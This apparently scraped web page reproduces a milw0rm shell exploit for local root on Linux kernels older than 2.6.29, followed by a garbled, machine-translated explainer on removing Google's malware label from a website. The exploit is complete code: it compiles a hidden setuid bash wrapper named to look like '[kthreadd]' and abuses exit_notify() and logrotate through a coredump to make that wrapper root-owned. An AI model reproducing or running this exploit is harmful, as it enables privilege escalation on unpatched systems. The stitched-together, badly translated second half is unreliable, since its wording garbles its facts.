Hacker Source

#!/bin/sh


# gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit
#
# by Milen Rangelov (gat3way-at-gat3way-dot-eu)
#
# Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov.
# Basically it allows us to send arbitrary signals to a privileged (suidroot)
# parent process. Due to a bad check, the child process with appropriate exit signal
# already set can first execute a suidroot binary then exit() and thus bypass
# in-kernel privilege checks. We use chfn and gpasswd for that purpose.
#
# !!!!!!!!!!!
# Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0
# so you'll be out of luck most of the time.
# So it is not going to be the script kiddies' new killer shit :-)
# !!!!!!!!!!!
#
# if you invent a better way to escalate privileges by sending arbitrary signals to
# the parent process, please mail me :) That was the best I could think of today :-(
#
# This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness
#
# Skuchna rabota...
#
####################################################################################

hacker safe



SUIDDUMP=`cat /proc/sys/fs/suid_dumpable`
if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi
if [ -d /etc/logrotate.d ]; then
echo "logrotate installed, that's good!"
else
echo "No logrotate installed, sorry!";exit
fi

echo -e "Compiling the bash setuid() wrapper..."
cat >> /tmp/.m.c << EOF
#include
#include

int main()
{
setuid(0);
execl("/bin/bash","[kthreadd]",NULL);
}
EOF

cc /tmp/.m.c -o /tmp/.m
rm /tmp/.m.c

echo -e "Compiling the exploit code..."

cat >> /tmp/exploit.c << EOF
#include
#include
#include
#include
#include

int child(void *data)
{
sleep(2);
printf("I'm gonna kill the suidroot father without having root rights :D\n");
execl("/usr/bin/gpasswd","%s",NULL);
exit(0);
}

int main()
{
int stacksize = 4*getpagesize();
void *stack, *stacktop;
stack = malloc(stacksize);
stacktop = stack + stacksize;
chdir("/etc/logrotate.d");
int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL);
if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL);
}
EOF

cc /tmp/exploit.c -o /tmp/.ex
rm /tmp/exploit.c

echo -e "Setting coredump limits and running the exploit...\n"
ulimit -c 10000
touch /tmp/.a
`/tmp/.ex >/dev/null 2>/dev/null`
sleep 5
rm /tmp/.ex

if [ -e /etc/logrotate.d/core ]; then
echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n"
echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root"
echo -e "\nYour terminal is most probably screwed now, sorry for that..."
exit
fi

echo "The system is not vulnerable, sorry :("

# milw0rm.com [2009-04-08]
hacker safe

There are some the matters require to in knowing:
Malware ( abbreviation of term English Ianguage ) malicious software, meaning the compromising software) is the computer program created for the purpose of and specific-purpose of his creator and is the program look for weakness from software. Generally malware created to leak or destroy a software or system operasi.(Wiki).

Badware is malicious software that tracks your moves online and feeds that information back to shady marketing groups so that they can ambush you with targeted ads. If your every move online is checked by a pop-up ad, it's highly likely that you, like 59 million Americans, have spyware or other malicious badware on your computer.(Stopbadware.org)

Google as search engine biggest in world wish to give the result search the cleanness and peaceful to searcher that good from side website and seo, special so for the things from side website, google besides doing crawl he/she also do scanning to website do website the contain script which including category malware/badware or don't.

In the activity google work along with stopbadware.org to give the information to:
Administrator(Suspect website) usually google will deliver the enamel to:

buse@website com
admin@website.com
administrator@website.com
contact@website.com
info@website.com *

so that you require to make one of the above enamel for precaution to catch the information in delivering by google, if website you is hit Label Malware.
They also inform to public society ( consumer Google Search), that website the contain Malware, by presenting be like this



Cause:
One of [the] process entry of malware/badware into website you can in causing by existence of virus in your computer, moment update website ( upload file php or html) that good through FTP or Browser hence virus will injection some script malware/badware into page website without you realize before all, so that when google do scanning and find script malware/badware is in website you is hence google will direct give Label Badware/Malware in SERP their.
They also inform to public society ( consumer Google Search), that website the contain Malware.

Way to overcome:

To overcome / to eliminate Label Badware/Malware in SERP Google, hence you require to do some matters is :
1. Do the sweeping script malware/badware [at] script website your
2. Ask review on the side of stopbadware.org
3. Ask review side Google

Special to poin which to 3. that is requesting review side of Google, its way is

1. You have to have account in google, can in the form of enamel in google.

2. Step into http://google.com/accounts select;choose Webmaster / Webmaster Tools
3. If the menu not shown was hence you had to enlist in google webmaster tools formerly.
4. Register website you is in google webmaster tools then do the verification / verify
5. After that verify please enter the menu Overview and click link Review site

Awaited 2 x 24 Jam, [stopbadware.org will review your website and if website you truely have clear of malware/badware hence they will contact google, then Google will do review directly.

After they express website you really clean hence Label Badware/Malware in SERP Google will soon in eliminating, usually process the abolition Label this eat the time of 1x24 [hour/clock]... patient thus yes.... :)